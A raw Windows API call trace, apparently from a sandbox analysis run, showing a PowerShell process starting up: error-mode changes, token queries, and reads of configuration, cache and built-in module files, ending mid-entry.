[0152.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.049] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0152.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0152.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0152.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0152.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0152.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0152.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0152.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0152.188] CoTaskMemAlloc (cb=0x20e) returned 0x2386b586890 [0152.188] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x2386b586890, nSize=0x105 | out: lpBuffer="") returned 0x0 [0152.190] CoTaskMemFree (pv=0x2386b586890) [0152.193] CoTaskMemAlloc (cb=0x20c) returned 0x2386b586890 [0152.193] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2386b586890 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0152.194] CoTaskMemFree (pv=0x2386b586890) [0152.194] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xafa508df60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0152.195] GetCurrentProcess () returned 0xffffffffffffffff [0152.195] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508e418 | out: TokenHandle=0xafa508e418*=0x68c) returned 1 [0152.195] GetTokenInformation (in: TokenHandle=0x68c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xafa508e518 | out: TokenInformation=0x0, ReturnLength=0xafa508e518) returned 0 [0152.195] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2386d358060 [0152.195] GetTokenInformation (in: TokenHandle=0x68c, TokenInformationClass=0x1, TokenInformation=0x2386d358060, TokenInformationLength=0x2c, ReturnLength=0xafa508e518 | out: TokenInformation=0x2386d358060, ReturnLength=0xafa508e518) returned 1 [0152.196] LocalFree (hMem=0x2386d358060) returned 0x0 [0152.199] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x238005bbbb8, cbSid=0xafa508e510 | out: pSid=0x238005bbbb8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xafa508e510) returned 1 [0152.203] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xafa508e3b0*=0x59c, lpdwindex=0xafa508e184 | out: lpdwindex=0xafa508e184) returned 0x0 [0152.427] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xafa508dee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0152.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e330) returned 1 [0152.427] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xafa508e410 | out: lpFileInformation=0xafa508e410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x38c33397, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x38c33397, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0152.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e2f0) returned 1 [0152.558] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xafa508dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0152.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e270) returned 1 [0152.559] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x690 [0152.561] GetFileType (hFile=0x690) returned 0x1 [0152.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1e0) returned 1 [0152.562] GetFileType (hFile=0x690) returned 0x1 [0152.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xafa508c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0152.854] CoTaskMemAlloc (cb=0x20c) returned 0x2386d6e34d0 [0152.855] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2386d6e34d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0152.855] CoTaskMemFree (pv=0x2386d6e34d0) [0152.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0xafa508ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0152.871] GetCurrentProcess () returned 0xffffffffffffffff [0152.871] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508cbf8 | out: TokenHandle=0xafa508cbf8*=0x694) returned 1 [0152.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0xafa508c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0152.880] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xafa508cca0 | out: lpFileInformation=0xafa508cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0152.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0xafa508c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0152.891] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xafa508cc98 | out: lpFileInformation=0xafa508cc98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0152.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0xafa508c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0152.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508cb10) returned 1 [0152.892] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x698 [0152.892] GetFileType (hFile=0x698) returned 0x1 [0152.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508ca80) returned 1 [0152.892] GetFileType (hFile=0x698) returned 0x1 [0152.895] GetFileSize (in: hFile=0x698, lpFileSizeHigh=0xafa508cbe8 | out: lpFileSizeHigh=0xafa508cbe8*=0x0) returned 0x8c8f [0152.895] ReadFile (in: hFile=0x698, lpBuffer=0x238005c05d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508cb58, lpOverlapped=0x0 | out: lpBuffer=0x238005c05d0*, lpNumberOfBytesRead=0xafa508cb58*=0x1000, lpOverlapped=0x0) returned 1 [0152.907] ReadFile (in: hFile=0x698, lpBuffer=0x238005c05d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508c938, lpOverlapped=0x0 | out: lpBuffer=0x238005c05d0*, lpNumberOfBytesRead=0xafa508c938*=0x1000, lpOverlapped=0x0) returned 1 [0152.909] ReadFile (in: hFile=0x698, lpBuffer=0x238005c05d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508c728, lpOverlapped=0x0 | out: lpBuffer=0x238005c05d0*, lpNumberOfBytesRead=0xafa508c728*=0x1000, lpOverlapped=0x0) returned 1 [0152.912] ReadFile (in: hFile=0x698, lpBuffer=0x238005c05d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508c728, lpOverlapped=0x0 | out: lpBuffer=0x238005c05d0*, lpNumberOfBytesRead=0xafa508c728*=0x1000, lpOverlapped=0x0) returned 1 [0152.912] ReadFile (in: hFile=0x698, lpBuffer=0x238005c05d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508c728, lpOverlapped=0x0 | out: lpBuffer=0x238005c05d0*, lpNumberOfBytesRead=0xafa508c728*=0x1000, lpOverlapped=0x0) returned 1 [0152.912] ReadFile (in: hFile=0x698, lpBuffer=0x238005c05d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508c5e8, lpOverlapped=0x0 | out: lpBuffer=0x238005c05d0*, lpNumberOfBytesRead=0xafa508c5e8*=0x1000, lpOverlapped=0x0) returned 1 [0152.920] ReadFile (in: hFile=0x698, lpBuffer=0x238005c05d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508c828, lpOverlapped=0x0 | out: lpBuffer=0x238005c05d0*, lpNumberOfBytesRead=0xafa508c828*=0x1000, lpOverlapped=0x0) returned 1 [0152.922] ReadFile (in: hFile=0x698, lpBuffer=0x238005c05d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508c6d8, lpOverlapped=0x0 | out: lpBuffer=0x238005c05d0*, lpNumberOfBytesRead=0xafa508c6d8*=0x1000, lpOverlapped=0x0) returned 1 [0152.926] ReadFile (in: hFile=0x698, lpBuffer=0x238005c05d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508c6d8, lpOverlapped=0x0 | out: lpBuffer=0x238005c05d0*, lpNumberOfBytesRead=0xafa508c6d8*=0xc8f, lpOverlapped=0x0) returned 1 [0152.927] ReadFile (in: hFile=0x698, lpBuffer=0x238005c05d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508c7f8, lpOverlapped=0x0 | out: lpBuffer=0x238005c05d0*, lpNumberOfBytesRead=0xafa508c7f8*=0x0, lpOverlapped=0x0) returned 1 [0152.927] CloseHandle (hObject=0x698) returned 1 [0152.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xafa508c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0152.929] CoTaskMemAlloc (cb=0x20c) returned 0x2386d6e47f0 [0152.929] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2386d6e47f0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0152.929] CoTaskMemFree (pv=0x2386d6e47f0) [0152.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0xafa508ca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0152.930] GetCurrentProcess () returned 0xffffffffffffffff [0152.930] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508ce28 | out: TokenHandle=0xafa508ce28*=0x698) returned 1 [0152.932] GetCurrentProcess () returned 0xffffffffffffffff [0152.932] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508ce28 | out: TokenHandle=0xafa508ce28*=0x69c) returned 1 [0152.933] GetCurrentProcess () returned 0xffffffffffffffff [0152.933] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508cbf8 | out: TokenHandle=0xafa508cbf8*=0x6a0) returned 1 [0152.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xafa508cca0 | out: lpFileInformation=0xafa508cca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xafa508c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0152.935] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xafa508cc98 | out: lpFileInformation=0xafa508cc98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.939] GetCurrentProcess () returned 0xffffffffffffffff [0152.939] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508ce28 | out: TokenHandle=0xafa508ce28*=0x6a4) returned 1 [0152.941] GetCurrentProcess () returned 0xffffffffffffffff [0152.941] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508ce28 | out: TokenHandle=0xafa508ce28*=0x6a8) returned 1 [0152.975] GetCurrentProcess () returned 0xffffffffffffffff [0152.975] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508cb88 | out: TokenHandle=0xafa508cb88*=0x6ac) returned 1 [0153.021] GetCurrentProcess () returned 0xffffffffffffffff [0153.021] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508cb98 | out: TokenHandle=0xafa508cb98*=0x6b0) returned 1 [0153.142] ReadFile (in: hFile=0x690, lpBuffer=0x238005e8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e0d8, lpOverlapped=0x0 | out: lpBuffer=0x238005e8308*, lpNumberOfBytesRead=0xafa508e0d8*=0x1000, lpOverlapped=0x0) returned 1 [0153.175] EtwEventRegister () returned 0x0 [0153.234] GetCurrentProcess () returned 0xffffffffffffffff [0153.235] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508da38 | out: TokenHandle=0xafa508da38*=0x6b8) returned 1 [0153.241] GetCurrentProcess () returned 0xffffffffffffffff [0153.242] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508da48 | out: TokenHandle=0xafa508da48*=0x6bc) returned 1 [0154.182] ReadFile (in: hFile=0x690, lpBuffer=0x23800629aa2, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0xafa508dd78, lpOverlapped=0x0 | out: lpBuffer=0x23800629aa2*, lpNumberOfBytesRead=0xafa508dd78*=0x1f, lpOverlapped=0x0) returned 1 [0154.182] ReadFile (in: hFile=0x690, lpBuffer=0x238005e8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508dd48, lpOverlapped=0x0 | out: lpBuffer=0x238005e8308*, lpNumberOfBytesRead=0xafa508dd48*=0x1000, lpOverlapped=0x0) returned 1 [0154.186] ReadFile (in: hFile=0x690, lpBuffer=0x23800629aa4, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0xafa508dbf8, lpOverlapped=0x0 | out: lpBuffer=0x23800629aa4*, lpNumberOfBytesRead=0xafa508dbf8*=0x27, lpOverlapped=0x0) returned 1 [0154.186] ReadFile (in: hFile=0x690, lpBuffer=0x238005e8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508dc98, lpOverlapped=0x0 | out: lpBuffer=0x238005e8308*, lpNumberOfBytesRead=0xafa508dc98*=0x1000, lpOverlapped=0x0) returned 1 [0154.186] ReadFile (in: hFile=0x690, lpBuffer=0x23800629a70, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0xafa508db58, lpOverlapped=0x0 | out: lpBuffer=0x23800629a70*, lpNumberOfBytesRead=0xafa508db58*=0x5, lpOverlapped=0x0) returned 1 [0154.186] ReadFile (in: hFile=0x690, lpBuffer=0x238005e8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508dbf8, lpOverlapped=0x0 | out: lpBuffer=0x238005e8308*, lpNumberOfBytesRead=0xafa508dbf8*=0x1000, lpOverlapped=0x0) returned 1 [0154.186] ReadFile (in: hFile=0x690, lpBuffer=0x23800629a42, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0xafa508dd08, lpOverlapped=0x0 | out: lpBuffer=0x23800629a42*, lpNumberOfBytesRead=0xafa508dd08*=0x1d, lpOverlapped=0x0) returned 1 [0154.186] ReadFile (in: hFile=0x690, lpBuffer=0x238005e8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508dda8, lpOverlapped=0x0 | out: lpBuffer=0x238005e8308*, lpNumberOfBytesRead=0xafa508dda8*=0xc85, lpOverlapped=0x0) returned 1 [0154.197] ReadFile (in: hFile=0x690, lpBuffer=0x238005e8308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508e0a8, lpOverlapped=0x0 | out: lpBuffer=0x238005e8308*, lpNumberOfBytesRead=0xafa508e0a8*=0x0, lpOverlapped=0x0) returned 1 [0154.198] CloseHandle (hObject=0x690) returned 1 [0154.199] CoTaskMemAlloc (cb=0x20e) returned 0x2386d6e34d0 [0154.199] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoloadingCacheMaintenance", lpBuffer=0x2386d6e34d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0154.199] CoTaskMemFree (pv=0x2386d6e34d0) [0154.201] CoTaskMemAlloc (cb=0x20c) returned 0x2386d6e5290 [0154.201] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2386d6e5290 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0154.201] CoTaskMemFree (pv=0x2386d6e5290) [0154.201] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xafa508dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0154.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0154.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.202] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0154.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0154.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.204] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0154.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0154.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.204] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" 